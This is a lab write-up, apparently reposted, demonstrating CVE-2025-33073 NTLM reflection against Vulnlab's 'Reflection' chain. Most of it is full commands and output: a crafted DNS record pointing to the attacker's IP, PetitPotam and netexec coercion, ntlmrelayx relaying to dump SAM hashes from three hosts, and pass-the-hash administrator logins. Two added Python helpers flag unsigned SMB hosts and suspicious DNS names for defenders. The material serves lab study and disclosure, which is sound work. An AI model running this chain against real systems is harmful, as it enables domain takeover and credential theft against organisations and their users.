Pwning Reflection with NTLM Reflection

admin, 19 June 2025 23:16:36

This post only demonstrates the attack itself. A detailed walkthrough of the "Reflection" chain is in a separate write-up I created, which you can find here: https://seriotonctf.github.io/Reflection-Vulnlab/

Synacktiv recently published a blog post on CVE-2025-33073 (NTLM reflection). In this post I demonstrate how to exploit this vulnerability in Vulnlab's "Reflection" chain. For an in-depth analysis, see Synacktiv's original blog post.

Conditions

For this attack to succeed, the following conditions must be met:

  • SMB signing must be disabled on the target

  • The attacker must be able to create DNS records

Attack

First, we check whether SMB signing is disabled on the targets

➜ nxc smb targets.txt
SMB         10.10.163.39    445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.163.37    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.163.38    445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

netexec confirms that none of the three targets enforces SMB signing (signing:False), so they are likely vulnerable to this attack
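As an added defender-side check (example code, not part of the original post or of netexec), the scan output above can be parsed to list every host that does not require SMB signing, which is the first precondition of this attack. The line layout is assumed to match the nxc output shown above; the sample scan is constructed.

```python
import re
from typing import Dict, List

# One nxc "smb" status line, in the layout the scan above prints
# (host line with OS, name, domain, signing and SMBv1 flags).
NXC_SMB_LINE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+"
    r"(?P<os>.+?)\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)

def parse_nxc_smb(output: str) -> List[Dict[str, object]]:
    """Return one dict per host line; progress bars and auth lines are skipped."""
    hosts: List[Dict[str, object]] = []
    for raw in output.splitlines():
        m = NXC_SMB_LINE.match(raw.strip())
        if not m:
            continue
        rec: Dict[str, object] = m.groupdict()
        rec["signing"] = rec["signing"] == "True"   # False: signing not required
        rec["smbv1"] = rec["smbv1"] == "True"
        hosts.append(rec)
    return hosts

def hosts_without_signing(output: str) -> List[str]:
    """Hostnames that do not require SMB signing, i.e. relay/reflection candidates."""
    return [str(h["host"]) for h in parse_nxc_smb(output) if not h["signing"]]

# Constructed sample in the same layout as the scan above; MS01 is shown
# with signing enabled here so the filter has something to exclude.
SAMPLE_SCAN = """\
SMB         10.10.163.39    445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.163.37    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.163.38    445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:True) (SMBv1:False)
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
"""

if __name__ == "__main__":
    for host in hosts_without_signing(SAMPLE_SCAN):
        print(f"{host}: SMB signing not required")
```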

Registering a DNS record

We need to register a new DNS record, in this case localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA, and point it at our IP address

➜ dnstool.py -u 'reflection.vl\abbie.smith' -p '<REDACTED>' 10.10.163.37 -a add -d 10.8.0.210 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Alternatively, we can create the DNS record using the hostname of the machine we want to exploit, for example DC01

➜ dnstool.py -u 'reflection.vl\abbie.smith' -p '<REDACTED>' 10.10.163.37 -a add -d 10.8.0.210 -r 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Let's verify that the DNS record has been created and points to the attacker's IP address

➜ dnstool.py -u 'reflection.vl\abbie.smith' -p '<REDACTED>' 10.10.163.37 -a query -d 10.8.0.210 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
DC=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=reflection.vl,CN=MicrosoftDNS,DC=DomainDnsZones,DC=reflection,DC=vl
[+] Record entry:
 - Type: 1 (A) (Serial: 90)
 - Address: 10.8.0.210

Alternatively, we can use the dig command

➜ dig localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl

; <<>> DiG 9.18.30-0ubuntu0.24.04.2-Ubuntu <<>> localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20625
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl    IN A

;; ANSWER SECTION:
localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. 180 IN A 10.8.0.210

;; Query time: 63 msec
;; SERVER: 10.10.163.37#53(DC01.reflection.vl) (UDP)
;; WHEN: Sun Jun 15 15:28:07 CET 2025
;; MSG SIZE  rcvd: 112

➜ dig DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl

; <<>> DiG 9.18.30-0ubuntu0.24.04.2-Ubuntu <<>> DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13727
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl    IN A

;; ANSWER SECTION:
DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. 180 IN A 10.8.0.210

;; Query time: 62 msec
;; SERVER: 10.10.163.37#53(DC01.reflection.vl) (UDP)
;; WHEN: Sun Jun 15 15:34:06 CET 2025
;; MSG SIZE  rcvd: 156
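The second precondition is the ability to create DNS records, which authenticated users have by default in an AD-integrated zone. As an added defender-side check (example code, not part of the original post), the following audits a zone's record names for the shape used above: a known host label or "localhost" followed by a long base64-like blob. The heuristic and the sample zone listing are constructed here.

```python
import re
from typing import Iterable, List, Tuple

# The records registered above are a hostname (or "localhost") with a long
# base64-looking blob appended; this heuristic looks for exactly that shape.
BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{20,}$")

def looks_like_blob(suffix: str) -> bool:
    """Base64-like, 20+ chars, mixed case and at least one digit."""
    return (bool(BLOB_RE.match(suffix))
            and any(c.isupper() for c in suffix)
            and any(c.islower() for c in suffix)
            and any(c.isdigit() for c in suffix))

def suspicious_dns_labels(labels: Iterable[str],
                          known_hosts: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (label, impersonated_prefix) for zone record names that embed a
    known host label or 'localhost' followed by a blob-like suffix."""
    prefixes = sorted({h.lower() for h in known_hosts} | {"localhost"},
                      key=len, reverse=True)  # longest prefix wins
    hits: List[Tuple[str, str]] = []
    for label in labels:
        low = label.lower()
        for prefix in prefixes:
            if low.startswith(prefix) and looks_like_blob(label[len(prefix):]):
                hits.append((label, prefix))
                break
    return hits

# Constructed zone listing: the three lab hosts, a legitimate hyphenated
# name that must not be flagged, and two names shaped like the ones above.
SAMPLE_LABELS = [
    "dc01", "ms01", "ws01", "localhost", "dc01-backup-server",
    "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA",
    "DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA",
]
KNOWN_HOSTS = ["DC01", "MS01", "WS01"]

if __name__ == "__main__":
    for label, prefix in suspicious_dns_labels(SAMPLE_LABELS, KNOWN_HOSTS):
        print(f"suspicious record {label!r} (impersonates {prefix})")
```

Feeding this a periodic export of the zone's record names, and alerting on new hits, gives an early signal that someone is staging this attack.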

Coercion

Now we just need to coerce authentication to the DNS record created earlier

➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.reflection.vl

PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:DC01.reflection.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

We can also use Netexec's coerce_plus module

➜ nxc smb DC01.reflection.vl -u abbie.smith -p '<REDACTED>' -M coerce_plus -o METHOD=Petitpotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
SMB         10.10.201.85    445    DC01    [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.201.85    445    DC01    [+] reflection.vl\abbie.smith:<REDACTED>
COERCE_PLUS 10.10.201.85    445    DC01    VULNERABLE, PetitPotam
COERCE_PLUS 10.10.201.85    445    DC01    Exploit Success, lsarpc\EfsRpcAddUsersToFile

The attack works

As you can see, the attack succeeded and we were able to dump the SAM, because the SYSTEM token was used for authentication

➜ ntlmrelayx.py -t "smb://DC01.reflection.vl" -smb2support
Impacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.163.37, attacking target smb://DC01.reflection.vl
[*] Authenticating against smb://DC01.reflection.vl as / SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.10.163.37, attacking target smb://DC01.reflection.vl
[*] Service RemoteRegistry is in stopped state
[*] Authenticating against smb://DC01.reflection.vl as / SUCCEED
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd
[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Done dumping SAM hashes for host: dc01.reflection.vl
[*] Done dumping SAM hashes for host: dc01.reflection.vl
[*] Stopping service RemoteRegistry

➜ nxc smb DC01.reflection.vl -u administrator -H <REDACTED>
SMB         10.10.163.37    445    DC01    [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.163.37    445    DC01    [+] reflection.vl\administrator:<REDACTED> (Pwn3d!)

In the same way, we can target MS01 and WS01

MS01

➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA ms01.reflection.vl

PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:ms01.reflection.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

➜ ntlmrelayx.py -t "smb://MS01.reflection.vl" -smb2support
Impacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.163.38, attacking target smb://MS01.reflection.vl
[*] Authenticating against smb://MS01.reflection.vl as / SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.10.163.38, attacking target smb://MS01.reflection.vl
[*] Service RemoteRegistry is in stopped state
[*] Authenticating against smb://MS01.reflection.vl as / SUCCEED
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Done dumping SAM hashes for host: ms01.reflection.vl
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Done dumping SAM hashes for host: ms01.reflection.vl
[*] Stopping service RemoteRegistry

➜ nxc smb MS01.reflection.vl -u administrator -H <REDACTED> --local-auth
SMB         10.10.163.38    445    MS01    [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         10.10.163.38    445    MS01    [+] MS01\administrator:<REDACTED> (Pwn3d!)

WS01

➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA WS01.reflection.vl

PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:WS01.reflection.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

➜ ntlmrelayx.py -t "smb://WS01.reflection.vl" -smb2support
Impacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.163.39, attacking target smb://WS01.reflection.vl
[*] Authenticating against smb://WS01.reflection.vl as / SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.10.163.39, attacking target smb://WS01.reflection.vl
[*] Service RemoteRegistry is in stopped state
[*] Authenticating against smb://WS01.reflection.vl as / SUCCEED
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Done dumping SAM hashes for host: ws01.reflection.vl
labadm:1001:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Done dumping SAM hashes for host: ws01.reflection.vl
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

➜ nxc smb WS01.reflection.vl -u administrator -H <REDACTED> --local-auth
SMB         10.10.163.39    445    WS01    [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.10.163.39    445    WS01    [+] WS01\administrator:<REDACTED> (Pwn3d!)

Resources

https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073

https://github.com/mverschu/CVE-2025-33073

Originally published on the WeChat public account Ots安全: Pwning Reflection with NTLM Reflection

Reposted by CN-SEC中文网: https://cn-sec.com/archives/4178707.html